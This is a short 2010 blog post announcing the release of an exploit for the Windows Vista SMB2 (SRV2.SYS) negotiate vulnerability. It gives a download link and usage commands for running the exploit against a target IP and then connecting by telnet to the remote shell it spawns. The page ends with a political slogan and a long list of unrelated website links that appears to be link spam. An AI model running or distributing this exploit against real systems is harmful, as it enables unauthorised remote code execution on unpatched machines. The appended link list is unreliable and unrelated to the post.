Vista SRV2.SYS SMB Exploit Code

by admin

Wednesday, August 18th, 2010 at 7:40 am

Piotr, who made kon-boot, finally decided to release the Vista smb2 Negotiate ProcessID Function Table Dereference exploit code he’s been sitting on since last fall.
Download: smb2_exploit_release.zip
It should spawn a shell on TARGET_IP on port 28876
Sample usage
————
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876

IP: Loading... - Host: Loading...
IP Geolocation: unknown.

We love our country, but fear our government.

https://iait-institute.org/
https://www.nintendo-nation.net/
https://wartabogor.com/
https://www.crstudent.com/
https://www.nusoundonline.com/
https://quernsmansionacafejy.com/
https://caminaresmedicina.com/
https://www.americasgreatestbrands.com/
https://www.bng-tech.com/en/
https://hoteldesetrangers.com.tr/canakkale/
https://www.5tips.co/freebies/
https://chicago43rd.org/
https://o.dijitalnesilakademisi.com/
https://cos.coop.py/creditos/
https://cakirgaraj.com/fiyat-listesi/
https://cakirogluikinciel.com/iletisim/
https://timetotimecourierservice.com/services.html
https://www.broadcastbuyer.tv/
https://vinadegracia.org/nosotros/